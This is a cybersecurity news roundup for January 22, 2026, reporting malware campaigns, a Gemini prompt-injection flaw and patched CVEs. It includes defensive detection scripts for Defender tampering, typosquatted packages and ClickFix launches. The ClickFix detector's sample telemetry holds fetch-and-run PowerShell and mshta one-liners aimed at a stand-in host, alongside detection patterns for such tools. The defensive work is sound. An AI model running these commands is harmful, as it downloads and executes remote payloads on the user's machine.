
Daily Cybersecurity Roundup, January 22, 2026

Attackers are letting AI do the dirty work. Researchers have identified "Android.Phantom," an Android malware family that uses on-device machine learning to automate ad-click fraud. Separately, a multi-stage campaign targeting Russian users relies on social engineering and spoofed business documents to disable Microsoft Defender through registry changes and abuse of Windows Security Center's trust assumptions. A further AI-driven Android click-fraud trojan ships TensorFlow.js models to locate ad elements on screen and interact with them, sidestepping detection built around fixed click scripts.

01

A new Android malware called "Android.Phantom" uses AI and machine learning to perform automated ad-click fraud and maintains persistent command-and-control through two operating modes, "phantom" and "signaling."

02

A multi-stage malware campaign targeting Russian users uses social engineering and fake business documents as the lure, then disables Microsoft Defender through registry changes and by abusing Windows Security Center's trust assumptions.
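The registry half of that technique is visible in endpoint telemetry. The following is an added detection example, not code from the roundup or from any vendor: it scans constructed Sysmon Event ID 13 (registry value set) records for writes that set the documented Defender Group Policy kill switches to 1. The flat dict field names and the sample dropper name are assumptions.

```python
"""Flag registry writes that switch off Microsoft Defender protection.

Added example (not code from the roundup or from any vendor). Events are
constructed Sysmon Event ID 13 ("RegistryEvent: Value Set") records in the
flat dict form a JSON exporter would emit; the field names are an assumption.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Group Policy values under HKLM\SOFTWARE\Policies that, when set to 1, turn
# off a Defender protection layer. These are the documented policy locations.
DEFENDER_KILL_SWITCHES = {
    r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware",
    r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring",
    r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring",
    r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection",
    r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection",
}


@dataclass(frozen=True)
class Finding:
    key: str      # canonical registry value path
    image: str    # process that performed the write
    value: int    # DWORD written


def parse_dword(details: str) -> Optional[int]:
    """Sysmon renders DWORD data as 'DWORD (0x00000001)'; return the integer."""
    m = re.fullmatch(r"DWORD \(0x([0-9A-Fa-f]{8})\)", details.strip())
    return int(m.group(1), 16) if m else None


def find_defender_tampering(events):
    """Return one Finding per write that sets a Defender kill switch to 1."""
    by_lower = {k.lower(): k for k in DEFENDER_KILL_SWITCHES}
    findings = []
    for ev in events:
        if ev.get("EventID") != 13:
            continue
        canonical = by_lower.get(ev.get("TargetObject", "").lower())
        if canonical is None:
            continue
        value = parse_dword(ev.get("Details", ""))
        if value == 1:   # 0 restores protection; only the disabling write is flagged
            findings.append(Finding(canonical, ev.get("Image", "?"), value))
    return findings


# Constructed sample telemetry: a dropper writing policy values, plus noise.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Users\ivan\AppData\Local\Temp\Dogovor_2026.exe",
     "TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "Image": r"C:\Users\ivan\AppData\Local\Temp\Dogovor_2026.exe",
     "TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware",
     "Details": "DWORD (0x00000000)"},   # re-enabling write, not flagged
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
     "Details": "DWORD (0x00000001)"},   # unrelated key, not flagged
]

if __name__ == "__main__":
    for f in find_defender_tampering(SAMPLE_EVENTS):
        print(f"{f.image} set {f.key} = {f.value}")
```

Two caveats for anyone turning this into a rule. With Tamper Protection on, Defender ignores these policy values, so a successful write shows intent rather than proof that protection is off; confirm with `Get-MpComputerStatus` on the host. The Security Center side of the campaign is not a registry write at all: check what Windows Security Center believes is registered with `Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct`, and treat a listed product that nobody installed as the tell.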

03

A malicious PyPI package named "sympy-dev" was found impersonating the legitimate SymPy library. It carried cryptomining malware, and its code, placed in specific polynomial routines, quietly downloads and executes further payloads while leaving minimal traces on the host.
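Names like "sympy-dev" are cheap to catch before installation. The following is an added example, not code from the roundup, SymPy, or PyPI: a pre-install audit that normalises requirement names per PEP 503 and flags entries that are an approved name plus a suspicious affix, or one edit away from an approved name. The approved list and the requirements text are constructed.

```python
"""Flag look-alike dependency names before `pip install`.

Added example (not code from the roundup, SymPy, or PyPI). KNOWN_PACKAGES is a
constructed stand-in for an organisation's approved list; the requirements
text at the bottom is constructed too.
"""
import re

KNOWN_PACKAGES = {"sympy", "numpy", "requests", "cryptography"}  # constructed allowlist
SUSPICIOUS_SUFFIXES = ("-dev", "-devel", "-utils", "-tools", "-py", "-python")
SUSPICIOUS_PREFIXES = ("python-", "py-")


def normalize(name: str) -> str:
    """PEP 503 name normalisation: case-fold and collapse runs of -_. to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance; package names are short, so O(len(a)*len(b)) is fine."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def requirement_name(line: str):
    """Project name from a requirements.txt line, or None for blanks/options."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith("-"):
        return None
    m = re.match(r"[A-Za-z0-9][A-Za-z0-9._-]*", line)
    return m.group(0) if m else None


def audit_requirements(text: str, known=KNOWN_PACKAGES):
    """Return (name_as_written, suspected_target, reason) for each look-alike."""
    known_norm = {normalize(k) for k in known}
    findings = []
    for line in text.splitlines():
        raw = requirement_name(line)
        if raw is None:
            continue
        name = normalize(raw)
        if name in known_norm:
            continue                      # exact approved name
        reason = None
        for suf in SUSPICIOUS_SUFFIXES:   # sympy-dev -> sympy
            if name.endswith(suf) and name[: -len(suf)] in known_norm:
                reason = (name[: -len(suf)], f"affix {suf!r} on an approved name")
                break
        if reason is None:
            for pre in SUSPICIOUS_PREFIXES:  # python-requests -> requests
                if name.startswith(pre) and name[len(pre):] in known_norm:
                    reason = (name[len(pre):], f"affix {pre!r} on an approved name")
                    break
        if reason is None:                # requets -> requests
            for k in sorted(known_norm):
                d = levenshtein(name, k)
                if d == 1 and len(k) >= 5:
                    reason = (k, "edit distance 1 from an approved name")
                    break
        if reason is not None:
            findings.append((raw, reason[0], reason[1]))
    return findings


# Constructed requirements file: two safe pins, one affix clone, one typo.
SAMPLE_REQUIREMENTS = """\
# pinned deps
numpy==1.26.4
sympy-dev>=1.12       # looks like SymPy, is not
requets==2.31.0       # missing letter
cryptography>=41
-r extra.txt
"""

if __name__ == "__main__":
    for raw, target, why in audit_requirements(SAMPLE_REQUIREMENTS):
        print(f"{raw!r}: {why} ({target!r})")
```

This is a triage filter, not a verdict: legitimate packages can share a prefix with an approved one, and the allowlist owner decides. The control that actually stops a substituted package is pinning with hashes (`pip install --require-hashes -r requirements.txt`), which rejects any artifact the lockfile did not record.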

04

The ClearFake campaign plants fake CAPTCHA challenges on compromised websites and uses the ClickFix technique: the "verification" steps instruct the victim to press keyboard shortcuts that open the Run dialog and paste a pre-copied command, so the victim executes the attacker's command and installs the malware themselves.
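The self-inflicted launch leaves a recognisable process shape: a scripting host spawned under explorer.exe (the Run dialog's parent) with a pasted one-liner that hides its window, fetches from a URL, runs the result in memory, or ends in the reassuring "I am not a robot" comment. The following is an added detection example, not code from the roundup or from any vendor; it runs those checks over constructed Sysmon Event ID 1 (process create) records, and the flat dict field names and sample command lines are assumptions.

```python
"""Spot ClickFix-style launches: a LOLBin spawned from the Run box with a
pasted, obfuscated one-liner.

Added example (not code from the roundup or from any vendor). Input is a list
of constructed Sysmon Event ID 1 (process create) records as flat dicts; the
field names are an assumption. A parent of explorer.exe is used as the
"typed into Win+R" signal because the Run dialog launches under Explorer.
"""
import ntpath
import re
from dataclasses import dataclass
from typing import List

LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
           "curl.exe", "certutil.exe", "wscript.exe", "cscript.exe"}

# Each indicator is independent; any one plus the parent/child shape flags.
# Patterns are deliberately loose and case-insensitive.
INDICATORS = {
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "encoded command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "remote fetch": re.compile(
        r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b"
        r"|\bmshta(?:\.exe)?\s+[\"']?https?://", re.I),
    "in-memory execution": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "url in command line": re.compile(r"https?://", re.I),
    "captcha-style comment": re.compile(r"#.*(?:not a robot|captcha|verification)", re.I),
}


@dataclass
class Finding:
    image: str
    command_line: str
    reasons: List[str]


def classify(event) -> List[str]:
    """Return the indicator names that fire for one process-create event."""
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    child = ntpath.basename(event.get("Image", "")).lower()
    if parent != "explorer.exe" or child not in LOLBINS:
        return []
    cmd = event.get("CommandLine", "")
    return [name for name, rx in INDICATORS.items() if rx.search(cmd)]


def find_clickfix(events) -> List[Finding]:
    """One Finding per event that matches the launch shape and an indicator."""
    out = []
    for ev in events:
        if ev.get("EventID") != 1:
            continue
        reasons = classify(ev)
        if reasons:
            out.append(Finding(ntpath.basename(ev["Image"]),
                               ev.get("CommandLine", ""), reasons))
    return out


# Constructed sample telemetry: two ClickFix launches and two benign spawns.
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm https://example.invalid/c.txt)" '
                    '# "I am not a robot - reCAPTCHA Verification ID: 7391"'},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://example.invalid/p.hta"},
    {"EventID": 1, "ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile -File build.ps1"},   # developer noise
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for f in find_clickfix(SAMPLE_EVENTS):
        print(f.image, "->", ", ".join(f.reasons))
```

On a host under investigation, the Run-box history at `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` preserves what the victim pasted, which confirms the vector after the fact. Treat the parent-process rule as one signal rather than a signature: ClickFix variants that have the victim paste into a terminal window instead of the Run dialog change the parent, while the command-line indicators above still apply.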

05

A large-scale phishing campaign, also labelled "ClickFix," abuses Facebook's account-verification and appeal workflows: social engineering walks victims into handing over session cookies, backup codes, and passwords, which the attackers then use to hijack the account sessions.

06

Another Android click-fraud trojan bundles TensorFlow.js machine learning models to recognise advertisement elements on screen and interact with them, rather than relying on the fixed click scripts that traditional detection keys on.

07

Researchers disclosed a vulnerability in Google Gemini in which a prompt injection bypassed Google Calendar's privacy controls, giving unauthorized access to private meeting details and allowing deceptive calendar events to be created.

08

Cisco has patched a critical zero-day remote code execution vulnerability (CVE-2026-20045) in its Unified Communications products, including Webex Calling; improper validation of user-supplied HTTP input lets an attacker gain root access.

09

GitLab has patched multiple high-severity vulnerabilities in its Community and Enterprise Editions, including a 2FA bypass (CVE-2026-0723) in which forged device responses defeat the second factor, and denial-of-service flaws triggered by crafted requests.

10

A critical authentication bypass (WT-2026-0001) in SmarterTools SmarterMail was exploited within two days of the patch's release: a crafted HTTP request resets the system administrator's password, after which the attacker can execute OS commands with elevated privileges.
